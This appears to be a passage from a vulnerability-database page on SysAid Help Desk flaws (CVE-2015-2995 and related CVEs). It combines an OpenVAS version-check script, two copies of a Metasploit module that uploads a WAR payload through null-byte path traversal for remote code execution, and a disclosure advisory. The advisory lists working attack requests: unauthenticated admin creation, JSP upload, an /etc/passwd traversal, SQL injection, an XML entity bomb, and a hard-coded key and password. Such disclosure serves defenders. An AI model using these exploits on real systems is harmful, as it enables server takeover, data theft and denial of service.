SysAid < 15.2 Unauthenticated File Upload Vulnerability

2015-06-11T00:00:00

Description

SysAid Help Desktop Software is prone to a unauthenticated file upload vulnerability

{"id": "OPENVAS:1361412562310106006", "type": "openvas", "bulletinFamily": "scanner", "title": "SysAid < 15.2 Unauthenticated File Upload Vulnerability", "description": "SysAid Help Desktop Software is prone to a unauthenticated\n file upload vulnerability", "published": "2015-06-11T00:00:00", "modified": "2020-04-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106006", "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "references": ["https://www.security-database.com/detail.php?alert=CVE-2015-2995"], "cvelist": ["CVE-2015-2995"], "lastseen": "2020-04-26T15:02:58", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2995"]}, {"type": "exploitdb", "idList": ["EDB-ID:43885"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132138", "PACKETSTORM:132736", "PACKETSTORM:132760"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32179"]}, {"type": "zdt", "idList": ["1337DAY-ID-23705", "1337DAY-ID-23898"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-2995"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:731246BBF736D94C1AB6AB77C5502B82"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/SYSAID_RDSLOGS_FILE_UPLOAD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132138"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32179"]}, {"type": "zdt", "idList": ["1337DAY-ID-23705"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310106006", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SysAid Unauthenticated File Upload Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:sysaid:sysaid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106006\");\n script_version(\"2020-04-23T05:44:42+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 05:44:42 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-11 10:02:43 +0700 (Thu, 11 Jun 2015)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-2995\");\n\n script_name(\"SysAid < 15.2 Unauthenticated File Upload Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_sysaid_detect.nasl\");\n script_mandatory_keys(\"sysaid/detected\");\n\n script_tag(name:\"summary\", value:\"SysAid Help Desktop Software is prone to a unauthenticated\n file upload vulnerability\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the vulnerable service is reachable and then\n check the version.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists in the RdsLogsEntry servlet which\n accepts unauthenticated file uploads and handles zip file contents in a insecure way. Note that this\n will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection\n against null byte injection in file names.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker can upload arbitrary files which could\n lead to remote code execution.\");\n\n script_tag(name:\"affected\", value:\"SysAid Help Desktop version 15.1.x and before.\");\n\n script_tag(name:\"solution\", value:\"Update to version 15.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.security-database.com/detail.php?alert=CVE-2015-2995\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:FALSE ) ) exit( 0 );\nvers = infos[\"version\"];\ndir = infos[\"location\"];\n\nif( ! dir ) exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/rdslogs?rdsName=\" + rand_str(length:4);\nreq = string('POST ', url, ' HTTP/1.1\\r\\n',\n 'Host: ', get_host_name(), '\\r\\n\\r\\n');\nbuf = http_keepalive_send_recv(port: port, data: req);\n\nif (buf =~ \"HTTP/1\\.. 200\" && version_is_less(version: vers, test_version: \"15.2\")) {\n report = report_fixed_ver(installed_version: vers, fixed_version: \"15.2\", install_path: dir);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659978038, "score": 1659978368}, "_internal": {"score_hash": "17542a396dbca96f5b567a5650db4d60"}}

{"packetstorm": [{"lastseen": "2016-12-05T22:22:31", "description": "", "cvss3": {}, "published": "2015-07-20T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 'rdslogs' Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-20T00:00:00", "id": "PACKETSTORM:132760", "href": "https://packetstormsecurity.com/files/132760/SysAid-Help-Desk-rdslogs-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. \nThe vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated \nfile uploads and handles zip file contents in a insecure way. By combining both weaknesses, \na remote attacker can accomplish remote code execution. Note that this will only work if the \ntarget is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection \nagainst null byte injection in file names. This module has been tested successfully on version \nv14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid \nseems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability \nfrom being exploited. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-2995' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] \n], \n'DefaultOptions' => { 'WfsDelay' => 30 }, \n'Privileged' => false, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 3 2015')) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \nOptString.new('TARGETURI', \n[true, 'Base path to the SysAid application', '/sysaid/']) \n], self.class) \nend \n \n \ndef check \nservlet_path = 'rdslogs' \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nif res && res.code == 200 \nreturn Exploit::CheckCode::Detected \nend \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \ntomcat_path = '../../../../' \nservlet_path = 'rdslogs' \n \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directory\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), \n'ctype' => 'application/xml', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \n# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(war_payload), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\" \n} \n}) \n \n# The server either returns a 200 OK when the upload is successful. \nif res && res.code == 200 \nprint_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\") \nregister_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \n10.times do \nselect(nil, nil, nil, 2) \n \n# Now make a request to trigger the newly deployed war \nprint_status(\"#{peer} - Attempting to launch payload in deployed WAR...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \n# Failure. The request timed out or the server went away. \nbreak if res.nil? \n# Success! Triggered the payload, should have a shell incoming \nbreak if res.code == 200 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132760/sysaid_rdslogs_file_upload.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:08", "description": "", "cvss3": {}, "published": "2015-07-17T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 'rdslogs' Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2995"], "modified": "2015-07-17T00:00:00", "id": "PACKETSTORM:132736", "href": "https://packetstormsecurity.com/files/132736/SysAid-Help-Desk-rdslogs-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => \"SysAid Help Desk 'rdslogs' Arbitrary File Upload\", \n'Description' => %q{ \nThis module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. \nThe vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated \nfile uploads and handles zip file contents in a insecure way. Combining both weaknesses \na remote attacker can accomplish remote code execution. Note that this will only work if the \ntarget is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection \nagainst null byte injection in file names. This module has been tested successfully on version \nv14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid \nseems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability \nfrom being exploited. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2015-2995' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] \n], \n'DefaultOptions' => { 'WfsDelay' => 30 }, \n'Privileged' => false, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 3 2015')) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \nOptString.new('TARGETURI', \n[true, 'Base path to the SysAid application', '/sysaid/']) \n], self.class) \nend \n \n \ndef check \nservlet_path = 'rdslogs' \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nif res && res.code == 200 \nreturn Exploit::CheckCode::Detected \nend \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \ntomcat_path = '../../../../' \nservlet_path = 'rdslogs' \n \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directory\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), \n'ctype' => 'application/xml', \n'vars_get' => { \n'rdsName' => bogus_file \n} \n}) \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \n# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => Zlib::Deflate.deflate(war_payload), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'rdsName' => \"#{tomcat_path}/tomcat/webapps/#{app_base}.war\\x00\" \n} \n}) \n \n# The server either returns a 200 OK when the upload is successful. \nif res && res.code == 200 \nprint_status(\"#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment\") \nregister_files_for_cleanup(\"tomcat/webapps/#{app_base}.war\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \n10.times do \nselect(nil, nil, nil, 2) \n \n# Now make a request to trigger the newly deployed war \nprint_status(\"#{peer} - Attempting to launch payload in deployed WAR...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \n# Failure. The request timed out or the server went away. \nbreak if res.nil? \n# Success! Triggered the payload, should have a shell incoming \nbreak if res.code == 200 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132736/sysaid_rdslogs_fle_upload.rb.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:17:55", "description": "", "cvss3": {}, "published": "2015-06-03T00:00:00", "type": "packetstorm", "title": "SysAid Help Desk 14.4 Code Execution / Denial Of Service / Traversal / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2996", "CVE-2015-2994", "CVE-2015-3000", "CVE-2015-3001", "CVE-2015-2999", "CVE-2015-2993", "CVE-2015-2997", "CVE-2015-2995", "CVE-2015-2998"], "modified": "2015-06-03T00:00:00", "id": "PACKETSTORM:132138", "href": "https://packetstormsecurity.com/files/132138/SysAid-Help-Desk-14.4-Code-Execution-Denial-Of-Service-Traversal-SQL-Injection.html", "sourceData": "`Hi, \n \ntl;dr Found lots of vulns in SysAid Help Desk 14.4, including RCE. \nSysAid have informed me they all have been fixed in 15.2, but no \nre-test was performed. \n \nFull advisory below, and a copy can be obtained at [1]. \n5 Metasploit modules have been released and currently awaiting merge \nin the moderation queue [2]. \n \nRegards, \nPedro \n \n[1]: https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt \n[2]: \nhttps://github.com/rapid7/metasploit-framework/pull/5470 \nhttps://github.com/rapid7/metasploit-framework/pull/5471 \nhttps://github.com/rapid7/metasploit-framework/pull/5472 \nhttps://github.com/rapid7/metasploit-framework/pull/5473 \nhttps://github.com/rapid7/metasploit-framework/pull/5474 \n \n>> Multiple vulnerabilities in SysAid Help Desk 14.4 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 03/06/2015 / Last updated: 03/06/2015 \n \n>> Background on the affected product: \n\"SysAid is an ITSM solution that offers all the essentials, with \neverything you need for easy and efficient IT support and effective \nhelp desk operations. Its rich set of features includes a powerful \nservice desk, asset management and discovery, self-service, and \neasy-to-use tools for understanding and optimizing IT performance.\" \n \nMetasploit modules that exploit #1, #2, #3, #4, #5 and #6 have been \nreleased and should be integrated in the Metasploit framework soon. \nAll vulnerabilities affect both the Windows and Linux versions unless \notherwise noted. \n \n \n>> Technical details: \n1) \nVulnerability: Administrator account creation \nCVE-2015-2993 (same CVE as #10) \nConstraints: none; no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/createnewaccount?accountID=1337&organizationName=sysaid&userName=mr_lit&password=secret&masterPassword=master123 \n \nThis creates an account with the following credentials: mr_lit:secret \nNote that this vulnerability only seems to be exploitable ONCE! \nSubsequent attempts to exploit it will fail even if the tomcat server \nis restarted. \n \n \n2) \nVulnerability: File upload via directory traversal (authenticated; \nleading to remote code execution) \nCVE-2015-2994 \nConstraints: valid administrator account needed (see #1 to create a \nvalid admin account) \nAffected versions: unknown, at least 14.4 \n \n \nPOST /sysaid/ChangePhoto.jsp?isUpload=true HTTP/1.1 \nContent-Type: multipart/form-data; \nboundary=---------------------------81351919525780 \n \n-----------------------------81351919525780 \nContent-Disposition: form-data; name=\"activation\"; filename=\"whatevs.jsp\" \nContent-Type: application/octet-stream \n \n<html><body><%out.println(System.getProperty(\"os.name\"));%></body><html> \n-----------------------------81351919525780-- \n \n \nThe response returns a page which contains the following: \nvar imageUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp?1422276751501\"; \nvar thumbUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp_thumb.jsp?1422276751501\"; \nif(imageUrl != null && $.trim(imageUrl).length > 0) \n{ \ndocument.getElementById(\"cropbox\").src = imageUrl; \ndocument.getElementById(\"preview\").src = thumbUrl; \nparent.glSelectedImageUrl = \n\"icons/user_photo/14222767515000.1049804910604456_temp.jsp\"; \n \nGo to http://<server>/sysaid/icons/user_photo/14222767515000.1049804910604456_temp.jsp \nto execute the JSP. \n \n \n3) \nVulnerability: File upload via directory traversal (unauthenticated; \nleading to remote code execution) \nCVE-2015-2995 \nConstraints: no authentication or any other information needed. The \nserver has to be running Java 7u25 or lower. This is because Java 7u40 \n(FINALLY!) rejects NULL bytes in file paths. See \nhttp://bugs.java.com/bugdatabase/view_bug.do?bug_id=8014846 for more \ndetails. \nAffected versions: unknown, at least 14.3 and 14.4 \n \nPOST /sysaid/rdslogs?rdsName=../../../../sample.war%00 \n<... WAR payload here ...> \n \n \n4) \nVulnerability: Arbitrary file download \nCVE-2015-2996 (same CVE as #8) \nConstraints: none; no authentication or any other information needed \n(see #5 to obtain the traversal path) \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd \n \n \n5) \nVulnerability: Path disclosure \nCVE-2015-2997 \nConstraints: none; no authentication or any other information needed \nAffected versions: unknown, at least 14.4; only works on the Linux version \n \nPOST /sysaid/getAgentLogFile?accountId=<traversal>&computerId=<junk characters> \n \nMetasploit PoC: \n \nlarge_traversal = '../' * rand(15...30) \nservlet_path = 'getAgentLogFile' \n \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), \n'method' => 'POST', \n'data' => \nZlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + \nrand(300))), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'accountId' => large_traversal + \nRex::Text.rand_text_alphanumeric(8 + rand(10)), \n'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) \n} \n}) \n \nThe response (res.body.to_s) will be similar to: \n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"> \n<HTML> \n<HEAD><TITLE>Error</TITLE></HEAD> \n<BODY> \n<H1>Internal Error No#14</H1> \n<H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip \n(Permission denied)</H2> \n</BODY></HTML> \n \nThe tomcat path is revealed between the H2 tags. \n \n \n6) \nVulnerability: Use of hard-coded cryptographic key \nCVE-2015-2998 \nConstraints: N/A \nAffected versions: unknown, at least 14.4 \n \nSysAid Help Desk uses a hard-coded encryption key and encryption \nparameters. If this is combined with an arbitrary file download \nvulnerability (such as #4), a malicious user can then decrypt the \ndatabase password by downloading the WEB-INF/conf/serverConf.xml file. \nAlgorithm: DES password based encryption with MD5 hash \nKey: \"inigomontoya\" \nSalt: [-87, -101, -56, 50, 86, 53, -29, 3] \nIterations: 19 \n \n \n7) \nVulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp \nCVE-2015-2999 \nConstraints: valid administrator account needed \nAffected versions: unknown, at least 14.4 \n \na) \nPOST /sysaid/genericreport HTTP/1.1 \naction=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin \n \nParameters: \ngroupFilter \n \naction=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no \n \nParameters: \ncustomSQL \n \naction=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin \n \nParameters: \ncustomSQL \n \n(3 different payloads are shown because the reportName parameter seems \nto change which parameters have the injection) \n \n \nb) \nPOST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE \nresizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= \n \nParameter: \ndir \n \n \nc) \nPOST /sysaid/RFCGantt.jsp HTTP/1.1 \nlistName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true \n \nAccepts injection between $$ in ganttSQL parameter. \n \n \n8) \nVulnerability: Denial of service \nCVE-2015-2996 (same CVE as #4) \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero \n \nThis request will cause the cpu to go to 100% and the memory to \nballoon for 30+ seconds. Sending lots of requests causes the server to \nslow down to a crawl (although it doesn't seem to crash or hang \nforever). \n \n \n9) \nVulnerability: XML Entity Expansion (leading to denial of service) \nCVE-2015-3000 \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \na) \nPOST /sysaid/agententry?deflate=0 \n<?xml version=\"1.0\"?> \n<!DOCTYPE lolz [ \n<!ENTITY lol \"lol\"> \n<!ELEMENT lolz (#PCDATA)> \n<!ENTITY lol1 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\"> \n<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\"> \n<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\"> \n<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\"> \n<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\"> \n<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\"> \n<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\"> \n<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\"> \n<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\"> \n]> \n<lolz>&lol9;</lolz> \n \nb) \nPOST /sysaid/rdsmonitoringresponse \n<lol bomb in POST data> \n \nc) \nPOST /sysaid/androidactions \n<lol bomb in POST data> \n \nThese requests will cause the cpu to go to 100% and the memory to \nbaloon for 10+ seconds. Sending lots of requests causes the server to \nslow down to a crawl (although it doesn't seem to crash or hang \nforever). \n \n \n10) \nVulnerability: Uncontrolled file overwrite \nCVE-2015-2993 (same CVE as #1) \nConstraints: no authentication or any other information needed \nAffected versions: unknown, at least 14.4 \n \nGET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm \n \nThis will overwrite the file with \"SysAid\". This string is fixed and \ncannot be controlled by the attacker. \n \n \n11) \nVulnerability: Use of hard-coded password for the SQL Server Express \nadministrator account \nCVE-2015-3001 \nConstraints: N/A \nAffected versions: unknown, at least 14.4 \n \nWhen installing SysAid on Windows with the built in SQL Server \nExpress, the installer sets the sa user password to \"Password1\". \n \n \n>> Fix: \nUpgrade to version 15.2 or higher. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132138/sysaidhelpdesk-execdos.txt", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-05T23:33:58", "description": "This Metasploit module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in a insecure way. Combining both weaknesses a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduce a protection against null byte injection in file names. This Metasploit module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being 